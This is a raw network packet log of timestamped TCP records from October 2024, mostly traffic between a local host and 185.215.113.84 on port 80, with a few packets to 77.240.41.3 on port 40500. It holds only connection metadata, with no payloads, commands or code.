Oct 26, 2024 07:27:22.636465073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636478901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636491060 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636501074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636517048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636542082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636806011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636822939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636836052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636846066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636852026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636861086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636878967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636904001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.636981964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.636998892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637006044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637012005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637017965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637020111 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.637025118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637027025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637029886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637034893 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637037039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.637047052 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.637067080 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.637089014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.677700996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677722931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677735090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677753925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677764893 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677774906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677776098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.677798033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.677819014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.677925110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677936077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677953005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677963018 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.677966118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.677989960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678014040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678702116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678719997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678733110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678745031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678745031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678755999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678756952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678771973 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678780079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678783894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678797007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678807974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678812981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678818941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.678832054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678842068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.678869963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.691992998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692013025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692024946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692037106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692050934 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.692071915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.692100048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692102909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.692111015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692136049 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.692145109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.692157984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692171097 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692181110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692187071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.692195892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.692257881 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.700360060 CEST	49987	40500	192.168.2.7	77.240.41.3
Oct 26, 2024 07:27:22.705627918 CEST	40500	49987	77.240.41.3	192.168.2.7
Oct 26, 2024 07:27:22.705691099 CEST	49987	40500	192.168.2.7	77.240.41.3
Oct 26, 2024 07:27:22.707246065 CEST	49987	40500	192.168.2.7	77.240.41.3
Oct 26, 2024 07:27:22.707292080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707323074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707334995 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707344055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707356930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707377911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707401991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707416058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707427979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707438946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707459927 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707489967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707500935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707511902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707523108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707530975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707535982 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707546949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707552910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707555056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707559109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707577944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707582951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707588911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707595110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707603931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707623005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707633972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707636118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707668066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707700968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707712889 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707725048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707740068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707765102 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707808971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707822084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707832098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707845926 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707873106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707876921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707890034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707901001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707915068 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707938910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.707963943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707974911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707988024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.707998991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708003044 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708026886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708031893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708045959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708058119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708067894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708069086 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708091974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708115101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708147049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708158970 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708168983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708180904 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708199978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708203077 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708213091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708225012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708235979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708236933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708247900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708257914 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708287954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708311081 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708322048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708333969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708360910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708360910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708376884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708383083 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708394051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708395958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708409071 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708414078 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708431959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708436966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708447933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708450079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708466053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708476067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708477020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708488941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708498955 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708504915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708523035 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708524942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708540916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708545923 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708554029 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.708570004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.708589077 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712498903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712541103 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712543964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712558031 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712574959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712584019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712588072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712599039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712599993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712610960 CEST	40500	49987	77.240.41.3	192.168.2.7
Oct 26, 2024 07:27:22.712619066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712636948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712662935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712666035 CEST	49987	40500	192.168.2.7	77.240.41.3
Oct 26, 2024 07:27:22.712672949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712702036 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712733984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712742090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712752104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.712769032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.712781906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.717941046 CEST	40500	49987	77.240.41.3	192.168.2.7
Oct 26, 2024 07:27:22.752031088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752084970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752104998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752125025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752137899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752145052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752149105 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752165079 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752168894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752181053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752185106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752193928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752213001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752213955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752224922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752239943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752243996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752259016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752271891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752280951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752290964 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752299070 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752310991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752311945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752324104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752334118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752345085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752347946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752347946 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752373934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752377033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752391100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752394915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752408028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752420902 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752423048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752441883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752448082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752460957 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752470970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752480984 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752486944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752497911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752520084 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752521992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752532959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752541065 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752545118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752554893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752573967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752589941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752589941 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752625942 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752638102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752650976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752672911 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752675056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752686024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752691031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752696991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752712011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752727032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752727032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752727032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752753973 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752779961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752809048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752842903 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752849102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752861023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752872944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752883911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752899885 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752911091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.752939939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752962112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752974033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.752976894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753000975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753010035 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753011942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753024101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753036022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753050089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753057957 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753071070 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753074884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753101110 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753110886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753120899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753124952 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753134012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753139973 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753145933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753159046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753179073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753189087 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753202915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753212929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753226042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753240108 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753237009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753253937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753262043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753273964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753283978 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753285885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753298044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753310919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753336906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753384113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753402948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753412962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753427982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753448963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753458023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753468990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753479958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753494024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753528118 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753540039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753549099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753550053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753550053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753550053 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753561020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.753571987 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.753599882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:22.754103899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:22.754143953 CEST	49982	80	192.168.2.7	185.215.113.84
